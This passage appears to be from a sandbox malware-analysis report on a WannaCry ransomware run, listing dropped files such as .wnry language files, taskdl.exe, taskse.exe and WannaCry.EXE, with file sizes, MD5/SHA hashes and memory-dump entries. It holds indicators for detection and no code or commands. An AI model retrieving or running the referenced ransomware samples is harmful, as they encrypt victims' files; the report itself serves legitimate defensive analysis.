e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

SHA512
3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

Download Submit
C:\Users\Admin\Desktop\msg\m_spanish.wnry

Filesize
36KB

MD5
8d61648d34cba8ae9d1e2a219019add1

SHA1
2091e42fc17a0cc2f235650f7aad87abf8ba22c2

SHA256
72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

SHA512
68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

Download Submit
C:\Users\Admin\Desktop\msg\m_swedish.wnry

Filesize
37KB

MD5
c7a19984eb9f37198652eaf2fd1ee25c

SHA1
06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

SHA256
146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

SHA512
43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

Download Submit
C:\Users\Admin\Desktop\msg\m_turkish.wnry

Filesize
41KB

MD5
531ba6b1a5460fc9446946f91cc8c94b

SHA1
cc56978681bd546fd82d87926b5d9905c92a5803

SHA256
6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

SHA512
ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

Download Submit
C:\Users\Admin\Desktop\msg\m_vietnamese.wnry

Filesize
91KB

MD5
8419be28a0dcec3f55823620922b00fa

SHA1
2e4791f9cdfca8abf345d606f313d22b36c46b92

SHA256
1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

SHA512
8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

Download Submit
C:\Users\Admin\Desktop\r.wnry

Filesize
864B

MD5
3e0020fc529b1c2a061016dd2469ba96

SHA1
c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade

SHA256
402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c

SHA512
5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

Download Submit
C:\Users\Admin\Desktop\s.wnry

Filesize
2.9MB

MD5
ad4c9de7c8c40813f200ba1c2fa33083

SHA1
d1af27518d455d432b62d73c6a1497d032f6120e

SHA256
e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b

SHA512
115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

Download Submit
C:\Users\Admin\Desktop\t.wnry

Filesize
64KB

MD5
5dcaac857e695a65f5c3ef1441a73a8f

SHA1
7b10aaeee05e7a1efb43d9f837e9356ad55c07dd

SHA256
97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6

SHA512
06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

Download Submit
C:\Users\Admin\Desktop\taskdl.exe

Filesize
20KB

MD5
4fef5e34143e646dbf9907c4374276f5

SHA1
47a9ad4125b6bd7c55e4e7da251e23f089407b8f

SHA256
4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

SHA512
4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

Download Submit
C:\Users\Admin\Desktop\taskse.exe

Filesize
21KB

MD5
846f131710a4515f1b35002c0a486b58

SHA1
16936f073c7d72e998628bb1752478f4bf89b566

SHA256
2d196f850ec834ad3b97edf38aaa447155e47afa62ea14b900610c046fe787af

SHA512
b670cba45d961ffdefc21f67470e56aace2a04117edfb78e4bf5719cf154bbee45e531e6f0788400c33f0475b2250fa915659d214babf389035a11fbcd65334b

Download Submit
C:\Users\Admin\Desktop\taskse.exe

Filesize
20KB

MD5
8495400f199ac77853c53b5a3f278f3e

SHA1
be5d6279874da315e3080b06083757aad9b32c23

SHA256
2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d

SHA512
0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

Download Submit
C:\Users\Admin\Desktop\u.wnry

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Desktop\windowswimn32.bat

Filesize
49B

MD5
cfb046d3c9513b92c1b287da26f97c28

SHA1
ea8208c4dad826b7fdb3b5b728863a95e86d4383

SHA256
a06f170d4f92bf290e38b0ce1c05bb59c95de2797b1a5253b949ad7e1be9818b

SHA512
dbeeea4d284f59e1455a5426334caa02458e88833aeece9817c51be616697ca4c399b2a9d0e8e44bf4a5ee63d0b37c0aed68c01f1748fa5a23ed6d2af62b3340

Download Submit
C:\Users\Admin\Desktop\windowswimn32.bat

Filesize
22B

MD5
fe669e0a3a56961fba38ef9b7f7d01dd

SHA1
338b6f4a3ec71587d53aec450ca5448928f966a1

SHA256
138b48a413afa60daa506090fa4332d913a1f9d895b6c289c36dd7db00019d64

SHA512
ff0bc50cef59421253578172602a56f9f9b3a8988a16576eaf8a004792d330c708dbed95f5f4074fb2eec36d7df7f4a0392c88420d2b0678cd907056a23cd41b

Download Submit
C:\Users\Admin\Desktop\windowswimn32.bat

Filesize
44B

MD5
ea260c435f9eb83e2b5041e734ff3598

SHA1
ca70d64367cbdffbbf24e82baff4048119203a2e

SHA256
3ade659fdae17c11c3f42b712f94045691fbd0b413428b73e1de8fe699e74615

SHA512
548624cc523aeb4136376f792d23b3f2aee4a676362f8a0dd0e8161f0df87ab926b82f67fc174eb5d9473c23f49e6ca962bc84479967f7e624250d94efa66876

Download Submit
C:\Users\Admin\Downloads\BcatCrypto.zip

Filesize
568KB

MD5
37cbda979b054f52a91629131ede55c9

SHA1
473fcf804ee3904601dc13c390e5bea4c58b5702

SHA256
33765f8786fe116b6a584a0a90c7e5622e12f3b6ac6967d9d5f0b7b93a72b895

SHA512
d72111cd07484976e4a8b5c63726c612f983286ae4992350742144eee49766fb70d18ace09674f84cf0f3d36421b8e9cdb56db5539ef96725322918a3a2db1ae

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 487298.crdownload

Filesize
86KB

MD5
f2db87b351770e5995e9fcaad47d9591

SHA1
4c75bd93f458096fbc27fa852e16ce25a602f267

SHA256
3113fa9a3cf00ed423a2c686a2ffb19586f6a047747de65a93436a7dca8fcfa7

SHA512
608e74274b555a239534a9d43514e07cb8aad9b13baf4cc383e8c21ea4e9ebd36162dc0b4bf30a0975c334facf23d6e63742e2bbe4ba400e80d9f191893a84fc

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 902501.crdownload

Filesize
431KB

MD5
fbbdc39af1139aebba4da004475e8839

SHA1
de5c8d858e6e41da715dca1c019df0bfb92d32c0

SHA256
630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da

SHA512
74eca8c01de215b33d5ceea1fda3f3bef96b513f58a750dba04b0de36f7ef4f7846a6431d52879ca0d8641bfd504d4721a9a96fa2e18c6888fd67fa77686af87

Download Submit
C:\Users\Admin\Downloads\WannaCry.EXE

Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\Downloads\WannaCry.EXE:Zone.Identifier

Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
\??\pipe\LOCAL\crashpad_2068_LUKXRYVTIYNZGJSJ

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2880-2822-0x0000000000C00000-0x0000000000E1C000-memory.dmp

Filesize
2.1MB

Download
memory/2880-2821-0x0000000000C00000-0x0000000000E1C000-memory.dmp

Filesize
2.1MB

Download
memory/3564-480-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/4716-1928-0x0000000074300000-0x0000000074382000-memory.dmp

Filesize
520KB

Download
memory/4716-1932-0x0000000000750000-0x0000000000A4E000-memory.dmp

Filesize
3.0MB

Download
memory/4716-1931-0x0000000074230000-0x0000000074252000-memory.dmp

Filesize
136KB

Download
memory/4716-1930-0x00000000741A0000-0x0000000074222000-memory.dmp

Filesize
520KB

Download
memory/4716-1929-0x0000000073F80000-0x000000007419C000-memory.dmp

Filesize
2.1MB

Download
memory/4716-1949-0x0000000074230000-0x0000000074252000-memory.dmp

Filesize
136KB

Download
memory/4716-1950-0x0000000073F80000-0x000000007419C000-memory.dmp

Filesize
2.1MB

Download
memory/4716-1947-0x00000000742E0000-0x00000000742FC000-memory.dmp

Filesize
112KB

Download
memory/4716-1945-0x0000000000750000-0x0000000000A4E000-memory.dmp

Filesize
3.0MB

Download
memory/4716-1951-0x00000000741A0000-0x0000000074222000-memory.dmp

Filesize
520KB

Download
memory/4716-1948-0x0000000074260000-0x00000000742D7000-memory.dmp

Filesize
476KB

Download
memory/4716-1946-0x0000000074300000-0x0000000074382000-memory.dmp

Filesize
520KB

Download
memory/4716-1955-0x0000000000750000-0x0000000000A4E000-memory.dmp

Filesize
3.0MB

Download
memory/4716-1960-0x0000000073F80000-0x000000007419C000-memory.dmp

Filesize
2.1MB

Download
memory/4716-1970-0x0000000000750000-0x0000000000A4E000-memory.dmp

Filesize
3.0MB

Download
memory/4716-1975-0x0000000073F80000-0x000000007419C000-memory.dmp

Filesize
2.1MB

Download
memory/4716-2001-0x0000000073F80000-0x000000007419C000-memory.dmp

Filesize
2.1MB

Download
memory/4716-1996-0x0000000000750000-0x0000000000A4E000-memory.dmp

Filesize
3.0MB

Download
memory/4716-2051-0x0000000000750000-0x0000000000A4E000-memory.dmp

Filesize
3.0MB

Download
memory/4716-2056-0x0000000073F80000-0x000000007419C000-memory.dmp

Filesize
2.1MB

Download
memory/4716-2084-0x0000000000750000-0x0000000000A4E000-memory.dmp

Filesize
3.0MB

Download
memory/4716-2089-0x0000000073F80000-0x000000007419C000-memory.dmp

Filesize
2.1MB

Download
memory/4716-2104-0x0000000000750000-0x0000000000A4E000-memory.dmp

Filesize
3.0MB

Download
memory/4716-2109-0x0000000073F80000-0x000000007419C000-memory.dmp

Filesize
2.1MB

Download
memory/4716-2111-0x0000000000750000-0x0000000000A4E000-memory.dmp

Filesize
3.0MB

Download